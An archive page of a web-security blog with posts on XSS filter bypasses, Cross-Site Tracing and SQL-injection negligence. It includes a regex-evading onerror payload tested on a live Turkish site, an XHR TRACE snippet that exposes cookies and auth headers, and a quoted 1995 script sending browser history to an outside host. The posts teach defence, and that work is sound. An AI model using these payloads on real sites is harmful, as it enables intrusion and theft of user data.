Posts below have been edited and updated from their original version. More entries are in the archive.

* * *
  • Just as there can be appsec truths, there can be appsec laws.

    Science fiction author Arthur C. Clarke succinctly described the wondrous nature of technology in what has come to be known as Clarke’s Third Law (from a letter published in Science in January 1968):

    Any sufficiently advanced technology is indistinguishable from magic.

    The sentiment of that law can be found in an earlier short story by Leigh Brackett, “The Sorcerer of Rhiannon,” published in Astounding Science-Fiction Magazine in February 1942:

    Witchcraft to the ignorant… Simple science to the learned.

    With those formulations as our departure point, we can now turn towards crypto, browser technologies, and privacy.

    The Latinate Lex Cryptobellum:

    Any sufficiently advanced cryptographic escrow system is indistinguishable from ROT13.

    Or in Leigh Brackett’s formulation:

    Cryptographic escrow to the ignorant . . . Simple plaintext to the learned.

    A few Laws of Browser Plugins:

    Any sufficiently patched Flash is indistinguishable from a critical update.

    Any sufficiently patched Java is indistinguishable from Flash.

    A few Laws of Browsers:

    Any insufficiently patched browser is indistinguishable from malware.

    Any sufficiently patched browser remains distinguishable from a privacy-enhancing one.

    For what are browsers but thralls to Laws of Ads:

    Any sufficiently targeted ad is indistinguishable from chance.

    Any sufficiently distinguishable person’s browser has tracking cookies.

    Any insufficiently distinguishable person has privacy.

    Writing against deadlines:

    Any sufficiently delivered manuscript is indistinguishable from overdue.

    Which leads us to the foundational Zeroth Law of Content:

    Any sufficiently popular post is indistinguishable from truth.

    * * *
  • I know what you’re thinking.

    “Did my regex block six XSS attacks or five?”

    You’ve got to ask yourself one question: “Do I feel lucky?”

    Well, do ya, punk?

    Maybe you read a few HTML injection (cross-site scripting) tutorials and think a regex solves this problem. Maybe. Let’s revisit that thinking. We’ll need an attack vector. It could be a URL parameter, form field, header, or any other part of an HTTP request.

    Choose an Attack Vector

    Many web apps implement a search functionality. That’s an ideal attack vector because the nature of a search box is to accept an arbitrary string, then display the search term along with any relevant results. It’s the display, or reflection, of the search term that often leads to HTML injection.

    For example, the following screenshot shows how Google reflects the search term “html injection attack” at the bottom of its results page. And the text node created in the HTML source.

    Google search Google search results Google search html source

    Here’s another example that shows how Twitter reflects the search term “deadliestwebattacks” in its results page. And the text node created in the HTML source.

    Twitter search Twitter search html source

    Let’s take a look at another site with a search box. Don’t worry about the text (it’s a Turkish site, the words are basically “search” and “results”). First, we try a search term, “foo”, to check if the site echoes the term into the response’s HTML. Success! It appears in two places: a title attribute and a text node.

    <a title="foo için Arama Sonuçları">Arama Sonuçları : "foo"</a>
    

    Next, we probe the page for tell-tale validation and output encoding weaknesses that indicate the potential for this vulnerability to be present. In this case, we’ll try a fake HTML tag, <foo/>.

    <a title="<foo/> için Arama Sonuçları">Arama Sonuçları : "<foo/>"</a>
    

    The site inserts the tag directly into the response. The <foo/> tag is meaningless for HTML, but the browser recognizes that it has the correct mark-up for a self-enclosed tag. Looking at the rendered version displayed by the browser confirms this:

    Arama Sonuçları : ""
    

    The <foo/> term isn’t displayed because the browser interprets it as a tag. It creates a DOM node of <foo> as opposed to placing a literal <foo/> into the text node between <a> and </a>.

    Inject a Payload

    The next step is to find a tag with semantic meaning for a browser. An obvious choice is to try <script> as a search term since that’s the containing element for JavaScript.

    <a title="<[removed]> için Arama Sonuçları">Arama Sonuçları : "<[removed]>"</a>
    

    The site’s developers seem to be aware of the risk of writing raw <script> elements into search results. In the title attribute, they replaced the angle brackets with HTML entities and replaced “script”  with “[removed]”.

    A good hacker would continue to probe the search box with different kinds of payloads. Since it seems impossible to execute JavaScript within a <script> element, we’ll try JavaScript execution within the context of an element’s event handler.

    Try Alternate Payloads

    Here’s a payload that uses the onerror attribute of an <img> element to execute a function:

    <img src="x" onerror="alert(9)">
    

    We inject the new payload and inspect the page’s response. We’ve completely lost the attributes, but the element was preserved:

    <a title="<img> için Arama Sonuçları">Arama Sonuçları : "<img>"</a>
    

    So, let’s modify out payload a bit. We condense it to a format that remains valid (i.e. a browser interprets it and it doesn’t violate the HTML spec). This step just demonstrates an alternate syntax with the same semantic meaning.

    <img/src="x"onerror=alert(9)>
    

    HTML injection payload

    Unfortunately, the site stripped the onerror function the same way it did for the <script> tag.

    <a title="<img/src="x"on[removed]=alert(9)>">Arama Sonuçları :
        "<img/src="x"on[removed]=alert(9)>"</a>
    

    Additional testing indicates the site apparently does this for any of the onfoo event handlers.

    Refine the Payload

    We’re not defeated yet. The fact that the site is looking for malicious content implies that it’s relying on regular expressions to deny list common attacks.

    Oh, how I love regexes. I love writing them, optimizing them, and breaking them. Regexes excel at pattern matching, but fail miserably at parsing. And parsing is fundamental to working with HTML.

    So, let’s unleash a mighty anti-regex hack. I’d call for a drum roll to build the suspense, but the technique is too trivial for that. All we do is add a greater than (>) symbol:

    <img/src="x>"onerror=alert(9)>
    

    HTML injection payload with anti-regex

    Look what happens to the site. We’ve successfully injected an <img> tag. The browser parses the element, but it fails to load the image called x> so it triggers the error handler, which pops up a friendly alert.

    <a title="<img/src=">"onerror=alert(9)> için Arama Sonuçları">Arama Sonuçları :
        "<img/src="x>"onerror=alert(9)>"</a>
    

    alert(9)

    Why does this happen? I don’t have first-hand knowledge of the specific regex, but I can guess at its intention.

    HTML tags start with the < character, followed by an alpha character, followed by zero or more attributes (with tokenization properties that create things name/value pairs), and close with the > character. It’s likely the regex was only searching for “on…” handlers within the context of an element, i.e. between < and > (the start and end tokens). A > character inside an attribute value doesn’t close the element. <_tag_ _attribute_="x>"..._onevent_=_code_> The browser’s parsing model understood the quoted string was a value token. It correctly handled the state transitions between element start, element name, attribute name, attribute value, and so on. The parser consumed each character and interpreted it based on the context of its current state.

    The site’s poorly-formed regex didn’t create a sophisticated enough state machine to handle the x> properly. (Regexes have their own internal state machines for pattern matching. I’m referring to the pattern’s implied state machine for HTML.) It looked for a start token, then switched to consuming characters until it found an event handler or encountered an end token – ignoring the possible interim states associated with tokenization based on spaces, attributes, or invalid markup.

    This was only a small step into the realm of HTML injection. For example, the web site reflected the payload on the immediate response to the attack’s request. In other scenarios the site might hold on to the payload and insert it into a different page. It’s still reflected by the site, but not on the immediate response. That would make it a persistent type of vuln because the attacker does not have to re-inject the payload each time the affected page is viewed. For example, lots of sites have phrases like, “Welcome back, Mike!”, where they print your first name at the top of each page. If you told the site your name was <script>alert(9)</script>, then you’d have a persistent HTML injection exploit.

    Rethink Defense

    For developers:

    • When user-supplied data is placed in a web page, encode it for the appropriate context. For example, use percent-encoding (e.g. < becomes %3c) for an href attribute; use HTML entities (e.g. < becomes &lt;) for text nodes.
    • Prefer inclusion lists (match what you expect) to exclusion lists (predict what you think should be blocked).
    • Work with a consistent character encoding. Unpredictable transcoding between character sets makes it harder to ensure validation filters treat strings correctly.
    • Prefer parsing to pattern matching. However, pre-HTML5 parsing has its own pitfalls, such as browsers’ inconsistent handling of whitespace within tag names. HTML5 codified explicit rules for acceptable markup.
    • If you use regexes, test them thoroughly. Sometimes a “dumb” regex is better than a “smart” one. In this case, a dumb regex would have just looked for any occurrence of “onerror” and rejected it.
    • Prefer to reject invalid input rather than massage it into something valid. This avoids a cuckoo-like attack where a single-pass filter would remove any occurrence of the word “script” from a payload like <scrscriptipt>, unintentionally creating a <script> tag.
    • Prefer to reject invalid character code points (and unexpected encoding) rather than substitute or strip characters. This prevents attacks like null-byte insertion, e.g. stripping null from &lgt;%00script> after performing the validation check, overlong UTF-8 encoding, e.g. %c0%bcscript%c0%bd, or Unicode encoding (when expecting UTF-8), e.g. %u003cscript%u003e.
    • Escape metacharacters correctly.

    For more examples of payloads that target different HTML contexts or employ different anti-regex techniques, check out the HTML Injection Quick Reference (HIQR). In particular, experiment with different payloads from the “Anti-regex patterns” at the bottom of Table 2.

    Page 71

    * * *
  • iPhone zombie

    This is how it began. Over two years ago I unwittingly planted the seeds of an undead horde into the pages of my book, Seven Deadliest Web Application Attacks.

    Only recently did I discover the rotted fruit of those seeds festering within the pages of Amazon.

    • Visit the book’s Amazon page.
    • Click on the “Look Inside!” feature.
    • Use the “Search Inside This Book” function to search for zombie.
    • Cower before approaching mass of flesh-hungry brutes. Or just click OK a few times.

    On page 16 of the book there is an example of an HTML element’s syntax that forgoes the typical whitespace used to separate attributes. The element’s name is followed by a valid token separator, albeit one rarely used in hand-written HTML. The printed text contains this line:

    <img/src="."alt=""onerror="alert('zombie')"/>
    

    onerror alert zombie

    The “Search Inside” feature lists the matches for a search term. It makes the search term bold (i.e. adds <b> markup) and includes the context in which the search term was found (hence the surrounding text with the full <img/src="."alt="" /> element). Then it just pops the contextual find into the list, to be treated as any other “text” extracted from the book.

    <img src="." alt="" onerror="alert('<b>zombie</b>')"/>
    

    Finally, the matched term is placed within an anchor so you can click on it to find the relevant page. Notice that the <img> tag hasn’t been inoculated with HTML entities; it’s a classic HTML injection attack.

    <a ... href="javascript:void(0)">
    <span class="sitbReaderSearch-result-page">Page 16 ...t require spaces to
        delimit their attributes.
        **<img src="." alt="" onerror="alert('<b>zombie</b>')"/>** JavaScript
        doesn't have to...
    

    This has actually happened before. In December 2010 a researcher in Germany, Dr. Wetter, reported the same effect via <script> tags when searching for content in different security books. He even found <script> tags whose src attribute pointed to a live host, which made the flaw infinitely more entertaining.

    iPad zombie

    In fact, this was such a clever example of an unexpected vector for HTML injection that I included Dr. Wetter’s findings in the new Hacking Web Apps book (pages 40 and 41, the same <img...onerror> example shows up a little later on page 59). Behold, there’s a different infestation on page 31. Try searching for zombie again. This time the server responds with a JSON payload that contains straight-forward <script> tags. This one was more tedious to track down. The <script> tags don’t appear in the search listing, but they do exist in the excerpt property of the JavaScript object that contains, applies bold tags, etc. for matches:

    {...,"totalResults":2,"results":[[52,"Page 31","... encoded characters with
    their literal values:  <a href=\"http://\"/>**<script>alert('<b>zombie</b>')
    </script>**@some.site/\">search again</a>   Abusing the authority component
    of a ...", ...}
    

    I only discovered this injection flaw when I recently searched the older book for references to the living dead. (Yes, a weird – but true – reason.)

    How did this happen?

    One theory is that an anti-XSS filter relied on a deny list to catch potentially malicious tags. In this case, the <img> tag used a valid, but uncommon, token separator that would have confused any filter expecting whitespace delimiters. One common approach to regexes is to build a pattern based on what we think browsers know. For example, a quick filter to catch <script> tags or opening tags (e.g. <iframe src...> or <img src...>) might look like this:

    <\[\[:alpha:\]\]+(\\s+|>)
    

    A payload like <img/src> bypasses the regex and the browser correctly parses the syntax to create an image element. Of course, the src attribute fails to resolve, thereby triggering the onerror event handler, leading to yet another banal alert() declaring the presence of an HTML injection attack.

    The <script> example is less clear without knowing more about the internals of the site. Perhaps a sequences of stripping quotes and buggy regexes misunderstood the href to actually contain an authority section? Don’t have a good guess for this one.

    This highlights one problem of relying on regexes to parse a grammar like HTML. Yes, it’s possible to create strong, effective regexes. However, a regex does not represent the parsing state machine of browsers, including their quirks, exceptions, and “fix-up” behaviors. Fortunately, HTML5 brings a measure of sanity to this mess by clearly defining rules of interpretation. On the other hand, web history foretells that we’ll be burdened with legacy modes and outdated browsers for years to come. So, be wary of those regexes.

    No. That’s not it.

    How did this really happen?

    Well, I listen to various music while I write. You might argue that it was the demonic influence (or awesome Tony Iommi riffs) of Black Sabbath that ensorcelled the pages or that Judas Priest made me do it. Or that March 30, 2010 – right around the book’s release – was a full moon. Maybe in one of Amazon’s vast, diversley-stocked warehouses an oil drum with military markings spilled over, releasing a toxic gas that infected the books. Me? I think we’ll never know.

    Maybe one day we’ll be safe from this kind of attack. HTML5 and Content Security Policy make more sandboxes and controls available for implementing countermeasures. But I just can’t shake the feeling that somehow, somewhere, there’re more lurking about.

    Until then, the most secure solution is to –

    – wait, what’s that noise at the door…?

    They're coming to get you, Barbara.

    * * *
  • In which an exposition of Twelve Web (In)Security Truths begins.

    #1 – Software execution is less secure than software design, but running code has more users.

    A site you send people to visit is infinitely more useable than the one you describe to people. (Value differs from usability. Before social media flamed you could raise $41 million dollars on a slide deck.) Talk all you want, but eventually someone wants you to deliver.

    Sure, you could describe Twitter as a glorified event loop around an echo server. You might even replicate it in a weekend with a few dozen lines of Python or Node.js and an EC2 instance. Just try scaling that napkin design to a few hundred million users while keeping security and privacy controls in place. That’s a testament to implementing a complex design. (Or scaling a simple design if you boil it down to sending and receiving tweets.)

    It’s possible to attain impressive security through careful design. A prominent example in cryptography is the “perfect secrecy”1 of the One-Time Pad (OTP). The first OTP appeared in 1882, designed in an era without the codified information theory or cryptanalysis of Claude Shannon and Alan Turing.2 Never the less, its design understood the threats to confidential communications when telegraphs and Morse code carried secrets instead of fiber optics and TCP/IP. Sadly, good designs are sometimes forgotten or their importance unrecognized. The OTP didn’t gain popular usage until its re-invention in 1917, along with a more rigorous proof of its security.

    But security also suffers when design becomes implementation. The OTP fails miserably should a pad be reused or is insufficiently random. The pad must be as long as the input to be ciphered. So, if you’re able to securely distribute a pad (remember, the pad must be unknown to the attacker), then why not just distribute the original message? Once someone introduces a shortcut in the name of efficiency or cleverness the security breaks. (Remember the Debian OpenSSL debacle?) This is why it’s important to understand the reasons for a design rather than treat it as a logic table to be condensed like the singularity of a black hole. Otherwise, you might as well use two rounds of ROT13.

    Web security has its design successes. Prepared statements are a prime example of a programming pattern that should have relegated SQL injection to the CVE graveyard. Avoiding it is inexcusable. Only devotees of Advanced Persistent Ignorance continue to blithely glue SQL statements together with string concatenation. SQL injection is so well-known (at least by hackers) and studied that a venerable tool like sqlmap has been refining exploitation for over six years. The X-Frame-Options header is another example of design that could dispatch a whole class of vulnerabilities (i.e. clickjacking).

    O, but how the Internet loves to re-invent vulns. Whether or not SQL injection is in its death throes, NoSQL injection promises to reanimate its bloated corpse. Herbet West would be proud.

    Sometimes software repeats the mistakes of other projects without considering or acknowledging the reasons for those mistakes. The Ruby on Rails Mass Assignment feature is reminiscent of PHP’s register_globals issues. Both PHP and Ruby On Rails are Open Source projects with large communities. It’s unfair to label the entire group as ignorant of security. But the question of priorities has to be considered. Do you have a default stance of high or low security? Do you have language features whose behavior changes based on configuration settings outside the developer’s control, or that always have predictable behavior?

    Secure design isn’t always easy. Apache’s reverse proxy/mod_rewrite bug went through a few iterations and several months of discussion before Apache developers arrived at an effective solution. Once again, you might argue that the problem lies with users (i.e. poor rewrite rules that omit a path component) rather than the software. Still, the vuln proved how difficult it is to refine security for complex situations.

    HTML injection is another bugbear of web security. (Which makes SQL injection the owlbear?) There’s no equivalent to prepared statements for building HTML on the fly; developers must create solutions for their programming language and web architecture. That doesn’t mean XSS isn’t preventable, prevention just takes more effort and more attention to the context where user-influenced data shows up in a page. Today’s robust JavaScript frameworks help developers avoid many of the XSS problems that arise from haphazard construction of HTML on the server.

    There’s hope on the horizon for countering HTML injection with design principles that are tied to HTTP Headers rather than a particular programming language or web framework. The Content Security Policy (CSP) has moved from a Mozilla effort to a standard for all browsers. CSP won’t prevent HTML injection from occurring, but it will diminish its exploitability because developers will be able to give browsers directives that prevent script execution, form submission, and more. CSP even has the helpful design feature of a monitor or enforce mode, thereby easing the transition to a possibly complex policy.

    Design is how we send whole groups of vulns to the graveyard. Good security models understand the threats a design counters as well as those it does not. Spend too much time on design and the site will never be implemented. Spend too much time on piecemeal security and you risk blocking obscure exploits rather than fundamental threats.

    As the ancient Fremen saying goes, “Truth suffers from too much analysis.”3 So too does design suffer in the face of scrutiny based on unspecific or unreasonable threats. It’s important to question the reasons behind a design and the security claims it makes. Sure, HSTS relies on the frail security of DNS. Yet HSTS is a significant improvement to HTTPS, which in turn is unquestionably better than HTTP. But if you refuse to implement an imperfect solution in favor of preserving the status quo of HTTP then you haven’t done enough consideration of the benefits of encryption.

    Nor are security checklists absolute. The httponly attribute prevents no vulnerabilities. It only prevents JavaScript from accessing a cookie. Blindly following the mantra that httponly must exist on all cookies ignores useful designs where JavaScript intentionally reads and writes cookie values. If you’ve put sensitive data into a Local Storage object, then an XSS vuln is going to expose all that tasty data to a hacker who cares little for the cookie’s accessibility.

    Design your way to a secure concept, code your way to a secure site. When vulnerabilities arise determine if they’re due to flaws in the design or mistakes in programming. A design that anticipates vulnerabilities (e.g. parameterized queries) should make it easy to fix inevitable bugs. Vulnerabilities that surprise developers should lead to design changes that provide more flexibility for resolving the problem. Inflexibility, whether in design or in code, is dangerous to security. Just like the Bene Gesserit say, “Any road followed precisely to its end leads precisely nowhere.”4


    1. In the sense of Claude Shannon’s “Communication Theory of Secrecy Systems”. 

    2.  As Steven Bellovin notes in his paper, an 1882 codebook contains an amusingly familiar phrase regarding identity questions, “Identity can be established if the party will answer that his or her mother’s maiden name is…“ It seems identity proofs haven’t changed in 130 years! 

    3. Frank Herbert. Dune Messiah. p. 81. 

    4. Frank Herbert. Dune. p. 69. 

    * * *
  • My current writing project has taken time away from adding new content lately. Here’s a brief interlude of The Twelve Web Security Truths I’ve been toying with as a side project. They are modeled on The Twelve Networking Truths from RFC 1925.

    1. Software execution is less secure than software design, but executing code attracts actual users.
    2. The time saved by not using parameterized queries to build SQL statements should be used to read about using parameterized queries.
    3. Same Origin Policy restricts the DOM access and JavaScript behavior of content loaded from multiple origins. Malware only cares about plugin and browser versions.
    4. Content with XSS vulns are affected by the Same Origin Policy, which is nice for XSS attacks that inject into the site’s origin.
    5. CSRF countermeasures like Origin headers mitigate CSRF, not XSS. Just like X-Frame-Options mitigates clickjacking, not XSS.
    6. Making data safe for serialization with JSON does not make the data safe for the site.
    7. There are four HTML injection vulns in your site today. Hackers will find two of them, the security team will find one, the dev team will introduce another one tomorrow.
    8. Deny lists miss the attack payload that works.
    9. A site that secures user data still needs to work on the privacy of user data.
    10. Hashing passwords with 1,000-round PBKDF2 increases the work factor to brute force the login page by a factor of 1. Increasing this to a 10,000-round PBKDF2 scheme provides an additional increase by a factor of 1.
    11. The vulnerabilities in “web 2.0” sites occur against the same HTML and JavaScript capabilities of “web 1.0” sites. HTML5 makes this different in the same way.
    12. A site is secure when a compromise can be detected, defined, and fixed with minimal effort and users are notified about it.
    13. Off-by-one errors only happen in C.
    * * *
  • The biggest threat to modern web applications is someone who exhibits Advanced Persistent Ignorance. Developers rely on all sorts of APIs to build complex software. This one makes code insecure by default. API is the willful disregard of simple, established security designs.

    First, we must step back into history to establish a departure point for ignorance. This is just one of many. Almost seven years ago on July 13, 2004 PHP 5.0.0 was officially released. Importantly, it included this note:

    A new MySQL extension named MySQLi for developers using MySQL 4.1 and later. This new extension includes an object-oriented interface in addition to a traditional interface; as well as support for many of MySQL’s new features, such as prepared statements.

    Of course, any new feature can be expected to have bugs and implementation issues. Even with an assumption that serious bugs would take a year to be worked out, that means PHP has had a secure database query mechanism for the past six years.1

    The first OWASP Top 10 list from 2004 mentioned prepared statements as a countermeasure.2 Along with PHP and MySQL, .NET and Java supported these, as did Perl (before its popularity was subsumed by buzzword-building Python and Ruby On Rails). In fact, PHP and MySQL trailed other languages and databases in their support for prepared statements.

    SQL injection itself predates the first OWASP Top 10 list by several years. One of the first summations of the general class of injection attacks was the 1999 Phrack article, Perl CGI problems. SQL injection was simply a specialization of these problems to database queries.

    So, we’ve established the age of injection attacks at over a dozen years old and reliable countermeasures at least six years old. These are geologic timescales for the Internet.

    There’s no excuse for SQL injection vulnerabilities to exist in 2011.

    It’s not a forgivable coding mistake anymore. Coding mistakes most often imply implementation errors – bugs due to typos, forgetfulness, or syntax. Modern SQL injection vulns are a sign of bad design. For six years, prepared statements have offered a means of establishing a fundamentally secure design for database queries. It takes actual effort to make them insecure. SQL injection attacks could still happen against a prepared statement, but only due to egregiously poor code that shouldn’t pass a basic review. (Yes, yes, stored procedures can be broken, too. String concatenation happens all over the place. Never the less, writing an insecure stored procedure or prepared statement should be more difficult than writing an insecure raw SQL statement.)

    Maybe one of the two billion PHP hobby projects on Sourceforge could be expected to still have these vulns, but not real web sites. And, please, never in sites for security firms. Let’s review the previous few months:

    The list may seem meager, but there’s an abundane of sites that have had SQL injection vulns. We just don’t have a crowdsourced equivalent for it like xssed.org tracks cross-site scripting.

    XSS is a little more forgivable, though no less embarrassing. HTML injection flaws continue to plague sites because of implementation bugs. There’s no equivalent of the prepared statement for building HTML or HTML snippets. This is why the vuln remains so pervasive: No one has figured out the secure, reliable, and fast way to build HTML with user-supplied data. This doesn’t imply that attempting to do so is a hopeless cause. On the contrary, JavaScript libraries can reduce these problems significantly.

    For all the articles, lists, and books published on SQL injection one must assume that developers are being persistently ignorant of security concepts to such a degree that five years from now we may hear yet again of a database hack that disclosed unencrypted passwords.

    If you’re going to use performance as an excuse for avoiding prepared statements then you either haven’t bothered to measure the impact, you haven’t understood how to scale web architectures, and you might as well turn off HTTPS for the login page so you can get more users logging in per second. If you have other excuses for avoiding database security, ask yourself if it takes longer to write a ranting rebuttal or a wrapper for secure database queries.

    There may in fact be hope for the future. The rush to scaleability and the pious invocation of “cloud” has created a new beast of NoSQL datastores. These NoSQL datastores typically just have key-value pairs with grammars that aren’t so easily corrupted by a stray apostrophe or semi-colon in the way that traditional SQL can be corrupted. Who knows, maybe security conferences will finally do away with presentations on yet another SQL injection exploit and find someone with a novel, new NoSQL Injection vulnerability.

    Advanced Persistent Ignorance isn’t limited to SQL injection vulnerabilities. It has just spectacularly manifested itself in them. There are many unsolved problems in information security, but there are also many mostly-solved problems. Big unsolved problems in web security are password resets (overwhelmingly relying on email) and using static credit card numbers to purchase items.

    SQL injection countermeasures are an example of a mostly-solved problem. Using prepared statements isn’t 100% secure, but it makes a significant improvement. User authentication and password storage is another area of web security rife with errors. Adopting a solution like OpenID can reduce the burden of security around authentication. As with all things crypto-related, using well-maintained libraries and system calls are far superior to writing your own hash function or encryption scheme.

    Excuses that prioritize security last in a web site design miss the point that not all security has to be hard. Nor does it have to impede usability or speed of development. Crypto and JavaScript libraries provide high-quality code primitives to build sites. Simple education about current development practices goes just as far. Sometimes the state of the art is actually several years old – because it’s been proven to work.

    The antidote to API is the continuous acquisition of knowledge and experience. Have some cake.


    1. MySQL introduced support for prepared statements in version 4.1, which was first released April 3, 2003. 

    2. https://www.owasp.org/index.php/A6_2004_Injection_Flaws 

    * * *
  • In January 2003 Jeremiah Grossman disclosed a method to bypass the HttpOnly1 cookie restriction. He named it Cross-Site Tracing (XST), unwittingly starting a trend to attach “cross-site” to as many web-related vulnerabilities as possible.

    Alas, the “XS” in XST evokes similarity to XSS (Cross-Site Scripting) which has the consequence of leading people to mistake XST as a method for injecting JavaScript. (Thankfully, character encoding attacks have avoided the term Cross-Site Unicode, XSU.) Although XST attacks rely on browser scripting to exploit the vulnerability, the vulnerability is not the injection of JavaScript. XST is a means for accessing headers normally restricted from JavaScript.

    Confused yet?

    First, review XSS. XSS vulnerabilities, better described as HTML injection, occur because a web application echoes an attacker’s payload within the HTTP response body – the HTML. This enables the attacker to modify a page’s DOM by injecting characters that affect the HTML’s layout, such as adding spurious characters like brackets (< and >) and quotes (' and "). Cross-site tracing relies on HTML injection to craft an exploit within the victim’s browser, but this implies that an attacker already has the capability to execute JavaScript. So, XST isn’t about injecting <script> tags into the browser; the attacker must already be able to do that.

    Cross-site tracing takes advantage of the fact that a web server should reflect the client’s HTTP message in its respose.2 The common misunderstanding of an XST attack’s goal is that it uses a TRACE request to cause the server to reflect JavaScript in the HTTP response body that the browser would consequently execute. As the following example shows, this is in fact what happens even though the reflection of JavaScript isn’t the real vulnerability. The green and red text indicates the response body. The request was made with netcat.

    Cross-site tracing

    The reflection of <script> tags is immaterial (the RFC even says the server should reflect the request without modification). The real outcome of an XST attack is that it exposes HTTP headers normally inaccessible to JavaScript.

    Let that sink in for a moment. XST attacks use the TRACE (or synonymous TRACK) method to read HTTP headers that are otherwise blocked from JavaScript access.

    For example, the HttpOnly attribute of a cookie is supposed to prevent JavaScript from reading that cookie’s properties. The Authentication header, which for HTTP Basic Auth is simply the Base64-encoded username and password, is not part of the DOM and is not directly readable by JavaScript.

    No cookie values or auth headers showed up when we made the request via netcat because, obviously, netcat doesn’t have the internal state a browser does. So, take a look at the server’s response when a browser’s XHR object is used to make a TRACE request for. This is the snippet of JavaScript:

    var xhr = new XMLHttpRequest();
    xhr.open('TRACE', 'https://test.lab/', false);
    xhr.send(null);
    if(200 == xhr.status)
        alert(xhr.responseText);
    

    The following image shows one possible response. Notice the text in red. The browser added the Authorization and Cookie headers to the XHR request, which have been reflected by the server:

    XST headers

    Now we see that both an HTTP Basic Authentication header and a cookie value have shown up in the response text. A simple JavaScript regex could extract these values, bypassing the normal restrictions imposed on script access to headers or protected cookies. The drawback for attackers is that modern browsers (such as the ones that have moved into this decade) are savvy enough to block TRACE requests through the XMLHttpRequest object, which leaves the attacker to look for alternate capabilities in plug-ins like Flash.

    This is the real vulnerability associated with cross-site tracing: peeking at header values. The exploit would be impossible without the ability to inject JavaScript in the first place3. Therefore, its real impact (or threat, depending on how you define these terms) is exposing sensitive header data. Hence, alternate names for XST could be TRACE disclosure attack, TRACE header reflection, TRACE method injection (TMI), or TRACE header & cookie (THC) attack.

    We’ll see if any of those actually catch on for the next OWASP Top 10 list.


    1. HttpOnly was introduced by Microsoft in Internet Explorer 6 Service Pack 1, which was released September 9, 2002. It was created to mitigate, not block, XSS exploits that explicitly attacked cookie values. It wasn’t a method for preventing html injection (aka cross-site scripting or XSS) vulnerabilities from occurring in the first place. Mozilla magnanimously adopted in it FireFox 2.0.0.5 four and a half years later. 

    2. Section 9.8 of the HTTP/1.1 RFC

    3. Security always has nuanced exceptions. Merely requesting TRACE /<script>alert(42)</script> HTTP/1.0 might be stored in the web server’s log file or a database. If some log parsing tool renders requests like this to a web page without filtering the content, then HTML injection once again becomes possible. This is often referred to as second order XSS – when a payload is injected via one application, stored, then rendered by a separate web app. 

    * * *
  • The Hacking Web Apps book covers HTML Injection and cross-site scripting (XSS) in Chapter 2. Within the restricted confines of the allotted page count, it describes one of the most pervasive attacks that plagues modern web applications.

    Yet XSS is old. Very, very old. Born in the age of acoustic modems barely a Planck Era after the creation of the web browser.

    Early descriptions of the attack used terms like “malicious HTML” or “malicious JavaScript” before the phrase “cross-site scripting” became canonized by the OWASP Top 10. While XSS is an easy point of reference, the attack could be more generally called HTML injection because an attack does not have to “cross sites” or rely on JavaScript to be successful. The infamous Samy attack didn’t need to leave the confines of MySpace (nor did it need to access cookies) to effectively DoS the site within 24 hours. And persistent XSS is just as dangerous if an attacker injects an iframe that points to a malware site – no JavaScript required.

    Here’s one of the earliest references to the threat of XSS from a message to the comp.sys.acorn.misc newsgroup on June 30, 19961. It mentions only a handful of possible outcomes:

    Another ‘application’ of JavaScript is to poke holes in Netscape’s security. To *anyone* using old versions of Netscape before 2.01 (including the beta versions) you can be at risk to malicious Javascript pages which can a) nick your history b) nick your email address c) download malicious files into your cache *and* run them (although you need to be coerced into pressing the button) d) examine your filetree.

    From that message we can go back several months to the announcement of Netscape Navigator 2.0 on September 18, 1995. A month later Netscape created a “Bugs Bounty” starting with its beta release in October. The bounty offered rewards, including a $1,000 first prize, to anyone who discovered and disclosed a security bug within the browser. A few weeks later the results were announced and first prize went to a nascent JavaScript hack.

    The winner of the bug hunt, Scott Weston, posted his find to an Aussie newsgroup. This was almost 15 years ago on December 1, 1995 (note that LiveScript was the precursor to JavaScript):

    The “LiveScript” that I wrote extracts ALL the history of the current netscape window. By history I mean ALL the pages that you have visited to get to my page, it then generates a string of these and forces the Netscape client to load a URL that is a CGI script with the QUERY_STRING set to the users History. The CGI script then adds this information to a log file.

    Scott, faithful to hackerdom tenets, included a pop-culture reference2 in his description of the sensitive data extracted about the unwitting victim:

    - the URL to use to get into CD-NOW as Johnny Mnemonic, including username and password. - The exact search params he used on Lycos (i.e. exactly what he searched for) - plus any other places he happened to visit.

    HTML injection targets insecure web applications. These were examples of how a successful attack could harm the victim rather than how a web site was hacked. Browser security is important to mitigate the impact of such attacks, but a browser’s fundamental purpose is to parse and execute HTML and JavaScript returned by a web application – a dangerous prospect when the page is laced with malicious content inserted by an attacker. The attack is almost indistinguishable from a modern payload. A real attack might only have used a more subtle <img> or <iframe> as opposed to changing the location.href:

    <SCRIPT LANGUAGE="LiveScript">
    i = 0
    yourHistory = ""
    while (i < history.length) {
      yourHistory += history[i]
      i++;
      if (i < history.length)
        yourHistory += "^"
      }
      location.href = "http://www.tripleg.com.au/cgi-bin/scott/his?" + yourHistory
      <!-- hahah here is the hidden script --></i>
    </SCRIPT>
    

    The actual exploit reflected the absurd simplicity typical of XSS attacks. They often require little effort to create, but carry a significant impact. This differs greatly from binary exploits (e.g. heap and buffer overflows) that require days, weeks, or months to develop.

    Before closing let’s take a tangential look at the original $1,000 “Bugs Bounty”. Today, the Chromium team offers $500 and $1,3373 rewards for security-related bugs. The Mozilla Foundation offers $500 and a T-Shirt.

    On the other hand, you can keep the security bug from the browser developers and earn $10,000 and a laptop for a nice, working exploit.

    Come to think of it…those options seem like a superior hourly rate to writing a book. And I cringe at the difference if you compare rates based on word count.


    1. Netscape Navigator 3.0 was already available in April of the same year. 

    2. Good luck tracking down the May 1981 issue of Omni Magazine in which William Gibson’s short story first appeared! 

    3. No, the extra $337 isn’t the adjustment for inflation from 1995, which would have made it $1,407.72 according to the Bureau of Labor and Statistics. It’s one of those numbers that, if you have to ask, you risk exposing yourself as a n00b. Don’t ask about that one either. 

    * * *
  • My book starts off with a discussion of cross-site scripting (XSS) attacks along with examples from 2009 that illustrate the simplicity of these attacks and the significant impact they can have. What’s astonishing is how little many of the attacks have changed. Consider the following example, over a decade old, of HTML injection before terms like XSS became so ubiquitous. The exploit appeared about two years before the blanket CERT advisory that called attention to insecurity of unchecked HTML.

    On August 24, 1998 a Canadian web developer, Tom Cervenka, posted a message to the comp.lang.javascript newsgroup that claimed

    We have just found a serious security hole in Microsoft’s Hotmail service (https://www.hotmail.com/) which allows malicious users to easily steal the passwords of Hotmail users.

    The exploit involves sending an e-mail message that contains embedded javascript code. When a Hotmail user views the message, the javascript code forces the user to re-login to Hotmail. In doing so, the victim’s username and password is sent to the malicious user by e-mail.

    Hotmail spoof

